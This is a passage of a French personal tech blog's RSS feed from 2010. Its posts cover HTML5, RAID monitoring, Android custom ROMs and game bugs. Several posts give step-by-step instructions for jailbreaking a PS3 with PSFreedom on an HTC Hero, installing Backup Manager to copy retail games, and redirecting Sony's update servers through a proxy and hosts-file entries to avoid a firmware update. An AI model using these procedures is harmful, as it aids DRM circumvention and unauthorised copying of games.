Il suffit de copier le paquet de backup manager sur une clef USB et de brancher celle ci sur votre PS3. On le retrouve ensuite dans le nouveau menu Install Package Files et on l’installe comme un jeu classique.
Une fois dans backup manager, il suffit de se laisser guider.</description>
      <content>&lt;p&gt;Et hop! &lt;a href=&#34;http://www.lamy.im/posts/psfreedom-sur-htc-hero-gsm&#34;&gt;Apres avoir libéré sa PS3&lt;/a&gt; il faut bien en faire quelque chose. Si on commençait par faire quelques backups de jeu?&lt;/p&gt;
&lt;p&gt;Il suffit de copier le &lt;a href=&#34;https://www.lamy.im/uploads/manager.pkg&#34;&gt;paquet de backup manager&lt;/a&gt; sur une clef USB et de brancher celle ci sur votre PS3. On le retrouve ensuite dans le nouveau menu &lt;em&gt;Install Package Files&lt;/em&gt; et on l’installe comme un jeu classique.&lt;/p&gt;
&lt;p&gt;Une fois dans backup manager, il suffit de se laisser guider. Il y de toute façon peu d’options disponibles.&lt;/p&gt;
&lt;p&gt;Le jeu est detecté à l’insertion du blu-ray et on peut le copier en appuyant sur &lt;em&gt;« O »&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;Note: Au lancement d’un backup, Backup Manager a besoin d’un jeu original dans la console quel qu’il soit. Ici j’ai lancé civilization avec Saints Row 2 dans la console.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Du html 5 à voir avec chromium</title>
      <link>https://www.lamy.im/posts/du-html-5-a-voir-avec-chromium/</link>
      <pubDate>Tue, 14 Sep 2010 16:33:58 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/du-html-5-a-voir-avec-chromium/</guid>
      <description>http://www.thewildernessdowntown.com/
Ce site présente un petit film interactif bien sympatique tout en html5. Il est optimisé pour chrome/chromium donc il est fortement recommandé d’utiliser ce navigateur sous peine de ramage sévère!
Pour rappel, quand je parle de chromium, il ne s’agit pas du jeu d’avion mais de la version open source de chrome, le navigateur internet de google.</description>
      <content>&lt;p&gt;&lt;a href=&#34;http://www.thewildernessdowntown.com/&#34;&gt;http://www.thewildernessdowntown.com/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Ce site présente un petit film interactif bien sympatique tout en html5. Il est optimisé pour chrome/chromium donc il est fortement recommandé d’utiliser ce navigateur sous peine de ramage sévère!&lt;/p&gt;
&lt;p&gt;Pour rappel, quand je parle de chromium, il ne s’agit pas du jeu d’avion mais de la version open source de chrome, le navigateur internet de google.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>psfreedom sur HTC Hero GSM</title>
      <link>https://www.lamy.im/posts/psfreedom-sur-htc-hero-gsm/</link>
      <pubDate>Tue, 14 Sep 2010 12:34:38 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/psfreedom-sur-htc-hero-gsm/</guid>
      <description>Voilà c’est fait. Pour les bienheureux qui ont encore le firmware 3.41 sur leur ps3. On peut enfin lancer des homebrew, copier les jeux sur le disque etc.
Et tout cela bien sur avec le HTC hero 🙂
Au préalable, vérifiez votre version de HBOOT. Si vous êtes en version .007 il faut downgrader.
Maintenant, passons aux choses sérieuses et au jailbreak/crack de la PS3 (rayez la mention qui vous gène).</description>
      <content>&lt;p&gt;Voilà c’est fait. Pour les bienheureux qui ont encore le firmware 3.41 sur leur ps3. On peut enfin lancer des homebrew, copier les jeux sur le disque etc.&lt;br&gt;
Et tout cela bien sur avec le HTC hero 🙂&lt;br&gt;
Au préalable, vérifiez votre version de HBOOT. Si vous êtes en version .007 il faut &lt;a href=&#34;http://www.lamy.im/uploads/htc-hero-gsm-downgrade-hboot&#34;&gt;downgrader.&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Maintenant, passons aux choses sérieuses et au jailbreak/crack de la PS3 (rayez la mention qui vous gène).&lt;br&gt;
Il faut commencer par télécharger fastboot &lt;a href=&#34;http://developer.htc.com/adp.html&#34;&gt;chez HTC&lt;/a&gt; ou ici:&lt;br&gt;
– &lt;a href=&#34;http://www.lamy.im/uploads/fastboot&#34;&gt;fasboot pour linux&lt;/a&gt;&lt;br&gt;
– &lt;a href=&#34;http://www.lamy.im/uploads/psfreedom.ko&#34;&gt;psfreedom.ko&lt;/a&gt;&lt;br&gt;
– &lt;a href=&#34;http://www.lamy.im/uploads/zImage&#34;&gt;zImage&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Ensuite, mettre le psfreedom.ko a la recine de la carte SD.&lt;/p&gt;
&lt;p&gt;Puis depuis votre pc préféré:&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;darkstar:/home/jc/android/sdk# ./fastboot boot zImage
creating boot image...
creating boot image - 2082816 bytes
downloading &amp;#39;boot.img&amp;#39;... OKAY
booting... OKAY
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Dans un terminal sur le téléphone:&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ su -
# insmod /sdcard/psfreedom.ko
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;(Le texte qui suit décrit la suite de la procédure et est une &lt;a href=&#34;http://wiki.psfreedom.com/wiki/Using_PSFreedom&#34;&gt;traduction libre de psfreedom&lt;/a&gt;)&lt;br&gt;
Une fois que c’est fait, débranchez votre ps3 et tout ce qui est raccordé a l’USB (sauf le Hero)&lt;br&gt;
Ensuite, appuyez rapidement sur le bouton &lt;em&gt;power&lt;/em&gt; puis sur le bouton &lt;em&gt;eject&lt;/em&gt; (aussi vite que possible)&lt;br&gt;
Si la manipulation a fonctionné, le démarrage prendra un peu plus de temps qu’à l’habitude&lt;br&gt;
La ps3 démarre et vous devez avoir 2 nouvelles options dans la section jeu du XMB, si c’est le cas, tout s’est bien déroulé et vous pouvez profiter pleinement de votre ps3.&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;https://www.lamy.im/backup-manager-sur-ps3&#34;&gt;Pour l’installation de backup manager c’est par ici.  &lt;/a&gt;&lt;br&gt;
Ressources:&lt;br&gt;
&lt;a href=&#34;http://wiki.psfreedom.com/wiki/HTC&#34;&gt;http://wiki.psfreedom.com/wiki/HTC&lt;/a&gt;_Hero&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note: Si vous mettez à jour la ps3 avec le firmware 3.42 qui corrige la faille utilisée, vous ne pourrez pas faire fonctionner psfreedom.&lt;/strong&gt;&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>HTC Hero GSM downgrade hboot</title>
      <link>https://www.lamy.im/posts/htc-hero-gsm-downgrade-hboot/</link>
      <pubDate>Tue, 14 Sep 2010 12:07:28 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/htc-hero-gsm-downgrade-hboot/</guid>
      <description>Pour une raison que je détaille dans le post suivant. J’ai eu besoin de downgrader le HBOOT sur mon téléphone qui est en version 1.76.0007. Cette version récente du HBOOT ne permet pas de charger une ROM via fastboot, ça n’empeche pas de rooter son téléphone mais pour d’autres usages c’est problématique 🙂
Je suis tombé sur ce site où est détaillée la procédure de downgrade de la rom ET du hboot.</description>
      <content>&lt;p&gt;Pour une raison que je détaille dans &lt;a href=&#34;http://www.lamy.im/psfreedom-sur-htc-hero-gsm&#34;&gt;le post suivant&lt;/a&gt;. J’ai eu besoin de downgrader le HBOOT sur mon téléphone qui est en version 1.76.0007. Cette version récente du HBOOT ne permet pas de charger une ROM via fastboot, ça n’empeche pas de rooter son téléphone mais pour d’autres usages c’est problématique 🙂&lt;/p&gt;
&lt;p&gt;Je suis tombé sur ce site où est détaillée la procédure de &lt;a href=&#34;http://forum.gsmhosting.com/vbb/f616/how-downgrade-g2-hero-hboot-1-76-0007-user-guide-1032169/&#34;&gt;downgrade de la rom ET du hboot&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;J’ai extrait le .zip du hboot:&lt;br&gt;
– &lt;a href=&#34;http://www.lamy.im/uploads/update-hero-hboot-1.76.0004-signed.zip&#34;&gt;hboot-1.76.0004&lt;/a&gt;&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>La vie en 8 bits</title>
      <link>https://www.lamy.im/posts/la-vie-en-8-bits/</link>
      <pubDate>Mon, 06 Sep 2010 14:49:05 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/la-vie-en-8-bits/</guid>
      <description>Juste histoire de partager un de mes bookmark…
Le site 8bitpeople regroupe des artistes de la scène musicale 8 bits.
Ce site titille non seulement la nostalgie mais fait aussi découvrir une autre façon de faire la musique.
Pas mal de belles surprises y sont disponible à l’écoute, allez y faire un tour.</description>
      <content>&lt;p&gt;Juste histoire de partager un de mes bookmark…&lt;/p&gt;
&lt;p&gt;Le site &lt;a href=&#34;http://www.8bitpeoples.com/&#34;&gt;8bitpeople&lt;/a&gt; regroupe des artistes de la scène musicale 8 bits.&lt;br&gt;
Ce site titille non seulement la nostalgie mais fait aussi découvrir une autre façon de faire la musique.&lt;br&gt;
Pas mal de belles surprises y sont disponible à l’écoute, allez y faire un tour.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Le raid c&#39;est bien, le hotswap c&#39;est mieux</title>
      <link>https://www.lamy.im/posts/le-raid-cest-bien-le-hotswap-cest-mieux/</link>
      <pubDate>Thu, 02 Sep 2010 14:53:55 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/le-raid-cest-bien-le-hotswap-cest-mieux/</guid>
      <description>Cette semaine, un disque de mon serveur à eu la bonne idée de mourir, comme ça, sans crier gare, sans tambours ni trompettes.
1 8 19 1 active sync /dev/sdb3 2 8 3 - faulty spare /dev/sda3 C’est la qu’on regrette de ne pas avoir de disques hotswap :&amp;rsquo;(. Un reboot sur un dom0, ça fait tout de suite du mal.
Une fois le disque changé, reboot fait et intégration du disque neuf dans le raid.</description>
      <content>&lt;p&gt;Cette semaine, un disque de mon serveur à eu la bonne idée de mourir, comme ça, sans crier gare, sans tambours ni trompettes.&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;1 8 19 1 active sync /dev/sdb3
2 8 3 - faulty spare /dev/sda3
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;C’est la qu’on regrette de ne pas avoir de disques hotswap :&amp;rsquo;(. Un reboot sur un dom0, ça fait tout de suite du mal.&lt;br&gt;
Une fois le disque changé, reboot fait et intégration du disque neuf dans le raid. Je me suis dit qu’il serait de bon ton d’avoir un script en crontab qui me tienne au courant par mail de l’état du RAID et SMART des disques.&lt;/p&gt;
&lt;p&gt;Ca m’a occupé pendant la reconstruction de RAID qui à pris plus d’une heure. C’est certainement tout vilain pas beau, mais ça fonctionne. Je le met ici pour ceux que ça interesse.&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;http://www.lamy.im/uploads/disk_monitor.sh&#34;&gt;disk_monit.sh&lt;/a&gt;&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Bientôt la rom custom finale avec android 2.1 pour HTC Hero [update]</title>
      <link>https://www.lamy.im/posts/bientot-la-rom-custom-finale-avec-android-2-1-pour-htc-hero/</link>
      <pubDate>Fri, 02 Jul 2010 11:26:51 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/bientot-la-rom-custom-finale-avec-android-2-1-pour-htc-hero/</guid>
      <description>Oyé Oyé !
Depuis des semaines et des mois qu’on attendait cette fâmeuse mise à jour des HTC Hero GSM de la part de HTC. C’est maintenant chose faite (depuis un petit moment déjà en Asie).
La mise à jour officielle se fait en OTA (Over The Air), cela concerne uniquement les mobiles qui tournent avec la dernière ROM stock.
En prenant comme base le firmware asiatique, Paul Modaco à commencer à travailler sur une version de sa custom ROM à base d’Android 2.</description>
      <content>&lt;p&gt;Oyé Oyé !&lt;/p&gt;
&lt;p&gt;Depuis des semaines et des mois qu’on attendait cette fâmeuse mise à jour des HTC Hero GSM de la part de HTC. C’est maintenant chose faite (depuis un petit moment déjà en Asie).&lt;/p&gt;
&lt;p&gt;La mise à jour officielle se fait en OTA (Over The Air), cela concerne uniquement les mobiles qui tournent avec la dernière ROM stock.&lt;/p&gt;
&lt;p&gt;En prenant comme base le firmware asiatique, Paul Modaco à commencer à travailler sur une version de sa custom ROM à base d’Android 2.1, ce sont les MC4 jusque la R4.
Depuis le &lt;a href=&#34;http://android.modaco.com/content/htc-hero-hero-modaco-com/310731/30-jun-r5-modaco-custom-rom-for-gsm-hero-now-with-online-kitchen-android-2-1/&#34;&gt;30 Juin est sortie la R5 de MCR4.&lt;/a&gt;, et ô joie! Elle est basé sur une stock ROM Européenne.&lt;/p&gt;
&lt;p&gt;Bien sur il y à toujours le même prérequis, c’est d’&lt;a href=&#34;http://www.lamy.im/posts/flash-du-htc-hero-fr-chez-orange&#34;&gt;avoir un ROM de recovery custom&lt;/a&gt; afin de pouvoir afin de mettre à jour la ROM radio et d’installer MCR4.&lt;/p&gt;
&lt;p&gt;Actuellement la version R5 est uniquement disponible sur la « online kitchen » reservée aux abonnés du site (9,99 £/an), les versions MCR4 R4 et MCR3.2 à base de sotck ROM 2.73 sont toujours librement disponible pour tout le monde via le forum.&lt;br&gt;
Sur le lien ci dessus, n’oubliez pas de télécharger et d’installer la ROMradio 63.18.55.06PU_6.35.15.11 qui va bien, notez qu’elle est incompatible avec les versions antérieures à Android 2.X.&lt;/p&gt;
&lt;p&gt;Normalement aucun wipe n’est requis mais j’ai du y avoir recourt pour faire fonctionner cette ROM en upgradant depuis MCR3.2; les applications htc.bg et htc.launcher plantaient au démarrage. J’ai également dû supprimer le repertoire app-private de la partition ext2 dédiée à APP2SD.&lt;/p&gt;
&lt;p&gt;Tout fonctionne bien, y compris en ce qui concerne la ROM radio. Je vais regarder la durée de vie de la batterie, le point commun de toutes les anciennes ROM custom à base d’android, 2.X (dérivées de stock ROM d’autres téléphones) était le suçage de batterie en règle.&lt;/p&gt;
&lt;p&gt;APP2SD est disponible sur MCR4 R5, pas de réinstallation des applis nécessaire. La nouvelle ROM apporte son lot de nouveautés comme le nouveau google maps, le client mail à jour, un widget pour latitude, la compatibilité avec Google goggles, Google navigation et d&amp;rsquo;autre Googleries.&lt;/p&gt;
&lt;p&gt;A vous de jouer :p&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;update:&lt;/strong&gt;&lt;br&gt;
– reboot brutal dans l’application appareil photo, pas reproduit ensuite&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>StatusNet et identi.ca, le twitter propre</title>
      <link>https://www.lamy.im/posts/statusnet-et-identi-ca-le-twitter-propre/</link>
      <pubDate>Mon, 07 Jun 2010 02:07:12 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/statusnet-et-identi-ca-le-twitter-propre/</guid>
      <description>Je viens de m’apercevoir que je suis über en retard sur tout ce qui concerne la vague web2, la hype attitude ou on share sa life avec sa community.
Twitter, le site de microblogging bien connu à un concurrent qui monte, il s’appelle identi.ca! La où je suis en retard, c’est que ce service à été lancé il y a 2 ans… Les ploucs comme moi peuvent continuer de lire ce billet, les autres peuvent laisser tomber et continuer de contribuer à leur projet préféré :p</description>
      <content>&lt;p&gt;Je viens de m’apercevoir que je suis über en retard sur tout ce qui concerne la vague web2, la hype attitude ou on share sa life avec sa community.&lt;/p&gt;
&lt;p&gt;Twitter, le site de microblogging bien connu à un concurrent qui monte, il s’appelle identi.ca! La où je suis en retard, c’est que ce service à été lancé il y a 2 ans… Les ploucs comme moi peuvent continuer de lire ce billet, les autres peuvent laisser tomber et continuer de contribuer à leur projet préféré :p&lt;/p&gt;
&lt;p&gt;On peut trouver sur wikipedia &lt;a href=&#34;http://en.wikipedia.org/wiki/Comparison_of_micro-blogging_services&#34;&gt;un comparatif des plateformes de microblogging&lt;/a&gt; fort intéressant. On y voit entre autre que identi.ca est le seul site à proposer un réel interfaçage avec jabber et ça c’est un très bon point 🙂&lt;br&gt;
On peut poster, suivre des utilisateurs etc, directement depuis son compte jabber, en ajoutant le robot qui va bien dans sa liste d’amis.&lt;/p&gt;
&lt;p&gt;Autre avantage d’identi.ca: le site tourne sous &lt;a href=&#34;http://status.net/&#34;&gt;StatusNet&lt;/a&gt; qui est un logiciel sous licence AGPL qui est librement téléchargeable, installable, modifiable et directement fonctionnel (testé et approuvé) pour ceux qui veulent autoheberger leur plateforme de microblogging.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Le bug du game over</title>
      <link>https://www.lamy.im/posts/le-bug-du-game-over/</link>
      <pubDate>Tue, 25 May 2010 11:30:54 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/le-bug-du-game-over/</guid>
      <description>Je joue en ce moment à Red Dead Redemption, un jeu qui aurait pu être excellent s’il n’était pas truffé de bugs.
J’ai moi même vécu deux expériences qui m’ont pour le moins désappointées.
Avec le jeu, j’ai eu un code qui permet de débloquer les missions permettant d’obtenir la tenue d’assassin. A ma seconde partie, je décide d’entrer ce code.
Petite surprise au déballage, la grosse faute sur le carton.</description>
      <content>&lt;p&gt;Je joue en ce moment à Red Dead Redemption, un jeu qui aurait pu être excellent s’il n’était pas truffé de bugs.&lt;/p&gt;
&lt;p&gt;J’ai moi même vécu deux expériences qui m’ont pour le moins désappointées.&lt;/p&gt;
&lt;p&gt;Avec le jeu, j’ai eu un code qui permet de débloquer les missions permettant d’obtenir la tenue d’assassin. A ma seconde partie, je décide d’entrer ce code.&lt;/p&gt;
&lt;p&gt;Petite surprise au déballage, la grosse faute sur le carton.. dire que ça se vend 30$ sur ebay 🙂&lt;/p&gt;
&lt;p&gt;Parmi les missions, il faut tuer ou capturer un certain « Mo van Baar », manque de bol, j’ai déjà capturé cet homme lors de ma première partie en tant que chasseur de prime.. la mission n’est pas complétée, impossible d’avoir la tenue.&lt;/p&gt;
&lt;p&gt;Je ne me suis pas formalisé sur ce bug étant donné que ce costume n’est pas important pour le déroulement de l’histoire et n’aurait rien apporté au plaisir du jeu.&lt;/p&gt;
&lt;p&gt;Le second bug est pour le moins gênant (Attention ça spoil méchant).&lt;/p&gt;
&lt;p&gt;Vers la fin du jeu, on rattrape Williamson et Allende. Il faut achever Williamson et Reyes notre comparse s’occupe d’Allende.&lt;br&gt;
Premier essai, Reyes ne tire par sur Allende, celui ci s’échappe et je n’ai pas moyen de l’abattre, mon perso ne peut pas bouger, je peux seulement tirer.&lt;br&gt;
A ce moment, je recharge la derniere sauvegarde, le personnage avance tout seul… J’abandonne.&lt;/p&gt;
&lt;p&gt;Deuxième essai, je tue Williamson, Reyes tue Allende… soulagement… ou pas. Le jeu est de nouveau bloqué.&lt;/p&gt;
&lt;p&gt;Je ne parle bien sur pas des bugs connus de la charrette volante, des ennemis qui se promènent sous la carte, des consoles qui freezent etc.&lt;br&gt;
Ce jeu est très immersif, l’histoire est bonne, les personnages intéressants, mais ce florilège de bugs suffisamment importants pour pouvoir être décelés en QA me choque.&lt;br&gt;
Le « jeu de l’année » fourmille de bugs, certains impactant réellement le plaisir de jeu, ou même empêchent la progression de l’histoire..&lt;/p&gt;
&lt;p&gt;Un jeu qui a été sorti sans être terminé, comme d’habitude, le client doit attendre un patch bien sagement sans aucune information de la part de l’éditeur.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Ironie quand tu nous tiens</title>
      <link>https://www.lamy.im/posts/ironie-quand-tu-nous-tiens/</link>
      <pubDate>Fri, 14 May 2010 20:28:52 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/ironie-quand-tu-nous-tiens/</guid>
      <description>Que de souvenirs… les releases de NOCD et autre crack/patch dont le disclaimer etait frappé du logo MYTH bien connu, ASCII art de rigueur. C’est au tour des studios de developpement d’utiliser le boulot de la team MYTH pour adapter leurs jeux a steam.
Ils sont visiblement plus apte a coller des DRM et des protections CD jusqu’a l’os qu’a les retirer pour continuer de vendre leurs propres produits.</description>
      <content>&lt;p&gt;Que de souvenirs… les releases de NOCD et autre crack/patch dont le disclaimer etait frappé du logo MYTH bien connu, ASCII art de rigueur. C’est au tour des &lt;a href=&#34;http://www.gameblog.fr/news_15477_max-payne-2-la-version-steam-etait-une-version-pirate&#34;&gt;studios de developpement d’utiliser le boulot de la team MYTH pour adapter leurs jeux a steam&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Ils sont visiblement plus apte a coller des DRM et des protections CD jusqu’a l’os qu’a les retirer pour continuer de vendre leurs propres produits.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Mise à jour du serveur jabber</title>
      <link>https://www.lamy.im/posts/mise-a-jour-du-serveur-jabber-2/</link>
      <pubDate>Fri, 09 Apr 2010 15:51:20 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/mise-a-jour-du-serveur-jabber-2/</guid>
      <description>Le serveur a subit quelques arrêt/relance cet après midi pour cause de mise à jour.
Pour ceux qui utilisent webpresence, il suffit de se réinscrire dessus, la méthode est expliquée ici.</description>
      <content>&lt;p&gt;Le serveur a subit quelques arrêt/relance cet après midi pour cause de mise à jour.&lt;/p&gt;
&lt;p&gt;Pour ceux qui utilisent webpresence, il suffit de se réinscrire dessus, la méthode est expliquée &lt;a href=&#34;http://www.lamy.im/afficher-son-status-jabber-sur-le-web&#34;&gt;ici&lt;/a&gt;.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Le custom firmware 3.21 pour ps3 est presque prêt</title>
      <link>https://www.lamy.im/posts/le-custom-firmware-3-21-pour-ps3-est-presque-pret/</link>
      <pubDate>Wed, 07 Apr 2010 20:59:14 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/le-custom-firmware-3-21-pour-ps3-est-presque-pret/</guid>
      <description>Pas besoin de long discours:
D’après son blog, Geohot à réussi à conserver la fonction OtherOS sur le firmware 3.21. Il ne donne pas de date pour fournir son CFW pour l’instant et il recommande toujours de rester en 3.15 comme indiqué ici.
Pour le moment, il n’est pas possible de savoir si ce firmware est un CFW installable sur toutes les consoles ou un hack du thème du XMB comme il l’a fait quelques semaines auparavant.</description>
      <content>&lt;p&gt;Pas besoin de long discours:&lt;/p&gt;

&lt;div style=&#34;position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;&#34;&gt;
  &lt;iframe src=&#34;https://www.youtube.com/embed/1-9wLWQ4-uA&#34; style=&#34;position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;&#34; allowfullscreen title=&#34;YouTube Video&#34;&gt;&lt;/iframe&gt;
&lt;/div&gt;

&lt;p&gt;D’après son blog, Geohot à réussi à conserver la fonction OtherOS sur le firmware 3.21. Il ne donne pas de date pour fournir son CFW pour l’instant et il recommande toujours de rester en 3.15 &lt;a href=&#34;http://www.lamy.im/contourner-linstallation-du-firmware-ps3-3-21-et-rester-en-3-15&#34;&gt;comme indiqué ici&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Pour le moment, il n’est pas possible de savoir si ce firmware est un CFW installable sur toutes les consoles ou un hack du thème du XMB comme il l’a fait quelques semaines auparavant.&lt;/p&gt;
&lt;p&gt;Le petit mot doux pour sony pour cloturer ses posts devient une habitude:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Note to the people who removed OtherOS, you are potentially turning 100000+ legit users into « hackers. »&lt;/p&gt;
&lt;/blockquote&gt;
</content>
    </item>
    
    <item>
      <title>Contourner l&#39;installation du firmware PS3 3.21 et rester en 3.15 [update]</title>
      <link>https://www.lamy.im/posts/contourner-linstallation-du-firmware-ps3-3-21-et-rester-en-3-15/</link>
      <pubDate>Sat, 03 Apr 2010 11:01:19 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/contourner-linstallation-du-firmware-ps3-3-21-et-rester-en-3-15/</guid>
      <description>Ce billet fait suite à celui ci.
J’ai décidé d’attendre de voir ce que donne le travail de Geohot sur le CFW 3.21, or il est indispensable de mettre à jour la console pour se connecter au Playstation Network.
Méthode de contournement:
Voici la requête que fait la PS3 à la connexion:
GET http://feu01.ps3.update.playstation.net/update/ps3/list/eu/ps3-updatelist.txt
Et le contenu du fichier:
# EU Dest=85;CompatibleSystemSoftwareVersion=3.2100-; Dest=85;ImageVersion=0000a20e;SystemSoftwareVersion=3.2100;CDN=http://deu01.ps3.update.playstation.net/update/ps3/image/eu/2010_0401_3a08ef6164a7770ae3e7d5b9f366437a/PS3UPDAT.PUP;CDN_Timeout=30; Ce fichier indique la dernière version du firmware et un endroit pour le télécharger, on va « proxyfier » la requête pour fournir des informations plus en accord avec le firmware qu’on souhaite garder.</description>
      <content>&lt;p&gt;Ce billet fait suite à &lt;a href=&#34;http://www.lamy.im/posts/sony-retire-la-fonction-otheros-de-la-ps3-via-le-firmware-3-21&#34;&gt;celui ci&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;J’ai décidé d’attendre de voir ce que donne le travail de Geohot sur le CFW 3.21, or il est indispensable de mettre à jour la console pour se connecter au Playstation Network.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Méthode de contournement:&lt;/strong&gt;&lt;br&gt;
Voici la requête que fait la PS3 à la connexion:&lt;br&gt;
&lt;code&gt;GET http://feu01.ps3.update.playstation.net/update/ps3/list/eu/ps3-updatelist.txt&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Et le contenu du fichier:&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# EU
Dest=85;CompatibleSystemSoftwareVersion=3.2100-;
Dest=85;ImageVersion=0000a20e;SystemSoftwareVersion=3.2100;CDN=http://deu01.ps3.update.playstation.net/update/ps3/image/eu/2010_0401_3a08ef6164a7770ae3e7d5b9f366437a/PS3UPDAT.PUP;CDN_Timeout=30;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Ce fichier indique la dernière version du firmware et un endroit pour le télécharger, on va « proxyfier » la requête pour fournir des informations plus en accord avec le firmware qu’on souhaite garder.&lt;br&gt;
J’ai utiliser le proxy squid sous linux mais on peut aussi utiliser tinyproxy ou autre chose, peu importe.&lt;/p&gt;
&lt;p&gt;Dans squid, ne pas oublier d’autoriser l’ip de la PS3, vu que celle ci ne sait pas s’identifier sur un proxy, on a pas le choix de la méthode.&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;acl localnet src 10.0.0.0/8 # RFC1918 possible internal network
http_access allow localnet
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Dans tinyproxy c’est une directive &lt;em&gt;allow&lt;/em&gt; de mémoire.&lt;/p&gt;
&lt;p&gt;Ensuite on modifie l’/etc/host pour forcer la résolution des serveurs de sony sur un serveur sur lequel on a la main.&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;87.98.160.160 fuk01.ps3.update.playstation.net
87.98.160.160 duk01.ps3.update.playstation.net
87.98.160.160 fus01.ps3.update.playstation.net
87.98.160.160 fjp01.ps3.update.playstation.net
87.98.160.160 feu01.ps3.update.playstation.net
87.98.160.160 fkr01.ps3.update.playstation.net
87.98.160.160 fmx01.ps3.update.playstation.net
87.98.160.160 fau01.ps3.update.playstation.net
87.98.160.160 fsa01.ps3.update.playstation.net
87.98.160.160 ftw01.ps3.update.playstation.net
87.98.160.160 fru01.ps3.update.playstation.net
87.98.160.160 fcn01.ps3.update.playstation.net
87.98.160.160 dus01.ps3.update.playstation.net
87.98.160.160 djp01.ps3.update.playstation.net
87.98.160.160 deu01.ps3.update.playstation.net
87.98.160.160 dkr01.ps3.update.playstation.net
87.98.160.160 dmx01.ps3.update.playstation.net
87.98.160.160 dau01.ps3.update.playstation.net
87.98.160.160 dsa01.ps3.update.playstation.net
87.98.160.160 dtw01.ps3.update.playstation.net
87.98.160.160 dru01.ps3.update.playstation.net
87.98.160.160 dcn01.ps3.update.playstation.net
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Ensuite, il faut servir le fichier ps3-updatelist.txt sur notre serveur web sous l’arborescence &lt;em&gt;/update/ps3/list/eu/&lt;/em&gt;&lt;br&gt;
Le fichier doit contenir les informations suivantes:&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# EU
Dest=85;CompatibleSystemSoftwareVersion=3.1500-;
Dest=85;ImageVersion=0000948f;SystemSoftwareVersion=3.1500;CDN=http://deu01.ps3.update.playstation.net/update/ps3/image/eu/2009_1210_54ee80e14e479f8351a988eb9a472072/PS3UPDAT.PUP;CDN_Timeout=30;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Conclusion, la ps3 fait sa requête pour obtenir ps3-updatelist.txt, le proxy l’envoie sur un serveur web connu qui lui sert le fichier correspondant au firmware 3.15 et non 3.21. La console n’est pas mise à jour et se connecte à internet et au PSN.&lt;/p&gt;
&lt;p&gt;L’IP fournie au dessus est celle du serveur web sur lequel est hebergé ce site, le fichier ps3-updatelist.txt n’y est présent que pour l’Europe.&lt;br&gt;
Pour le moment je ne prévois de l’utiliser que pour moi donc c’est susceptible de ne plus fonctionner à tout moment, je vous suggère d’utiliser votre propre serveur web ou de me prévenir pour que je laisse tout ca en place le temps qu’il faudra 🙂&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;http://ps3dev.wikispaces.com/Update+List&#34;&gt;Description du fichier ps3-updatelist.txt&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE: Cette méthode ne fonctionne plus, sony bloque malgres tout l’acces au Playstation Network aux machines qui ne sont pas dans la derniere version du firmware. Il faudra faire le choix de se passer de PSN en attendant du neuf ou de mettre à jour et dire adieux à OtherOS.&lt;/strong&gt;&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>SONY retire la fonction OtherOS de la PS3 via le firmware 3.21</title>
      <link>https://www.lamy.im/posts/sony-retire-la-fonction-otheros-de-la-ps3-via-le-firmware-3-21/</link>
      <pubDate>Fri, 02 Apr 2010 14:47:51 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/sony-retire-la-fonction-otheros-de-la-ps3-via-le-firmware-3-21/</guid>
      <description>Les mises à jour de firmware sont habituelles pour nombre d’entre nous.
